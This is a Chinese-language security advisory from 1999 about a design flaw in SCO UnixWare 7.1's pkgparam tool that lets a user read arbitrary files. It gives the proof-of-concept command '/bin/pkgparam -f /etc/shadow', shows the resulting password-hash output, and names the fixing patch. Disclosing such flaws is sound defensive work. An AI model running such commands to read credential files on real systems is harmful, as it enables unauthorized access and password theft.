SCO UnixWare 'pkg'命令漏洞发布时间:1999-12-03 更新时间:1999-12-03 严重程度:中 威胁程度:读取受限文件 错误类型:设计错误 利用方式:服务器模式 受影响系统 SCO Unixware 7.1详细描述 一些版本的SCO UNIXWARE搭带的一系列安装/反安装的工具 可以查看任意文件。 测试代码 bash-2.02$ ls -la /bin/pkgparam -r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam bash-2.02$ /bin/pkgparam -f /etc/shadow Dy0l3OC7XHsj.:10925:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: NP:6445:::::: *LK*::::::: *LK*::::::: *LK*::::::: BgusHRQZ9MH2U:10878:::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: *LK*::::::: nv.Xrh2V3vArc:10882:::::: ozT.yeRe1/dxY:10882:::::: RinwpQfqabYbc:10928:::::: bash-2.02$ 解决方案 下载SCO的补丁: http://www.sco.com/security Patch ID: SSE053 相关信息 |
